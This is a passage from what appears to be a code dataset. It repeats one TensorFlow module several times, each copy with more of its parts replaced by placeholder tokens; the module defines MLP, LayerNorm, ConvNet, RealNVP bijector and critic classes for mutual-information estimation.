LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n <function token>\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n <function token>\n <function token>\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, 